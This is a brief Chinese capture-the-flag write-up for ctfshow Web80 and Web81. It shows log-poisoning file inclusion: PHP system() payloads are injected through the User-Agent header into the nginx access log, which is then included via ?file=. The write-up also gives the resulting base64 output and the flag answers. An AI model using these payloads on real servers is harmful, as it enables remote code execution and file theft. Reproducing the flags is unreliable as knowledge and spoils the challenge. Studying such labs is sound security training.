2022/4/16
题目过滤了php和data,我们这次要用日志文件包含
先抓包
nginx日志的默认路径为/var/log/nginx.
ssh日志的默认路径为/var/log/auth.log
SSH服务如果开启了日志记录功能,会将SSH的连接日志记录到SSH日志文件中(题目是nginx日志)日志文件包含的漏洞的利用条件是:日志路径已知,并且有可读权限。日志文件的默认路径为上述
现在要将恶意代码写入日志文件
/?file=/var/log/nginx/access.log
<?php system(ls); ?>
得到fl0g.php
在User-Agent中输入
<?php system('base64 fl0g.php');?>
得到flag的base64编码
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMg
QERhdGU6ICAgMjAyMC0wOS0xNiAxMToyNDozNw0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhh
DQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMTYgMTE6MjU6MDANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3s4Mzc4ZGVhZC1kYzQxLTRmNDctYTY5ZS01MmVkZDY1MjEwZjd9Ijs=
解码后得到
ctfshow{8378dead-dc41-4f47-a69e-52edd65210f7}
Web81
多过滤了:
/?file=/var/log/nginx/access.log
<?php system(ls); ?>
在User-Agent中输入
<?php system('base64 fl0g.php');?>
ctfshow{95544252-d2bb-4a39-96f8-26d34164996e}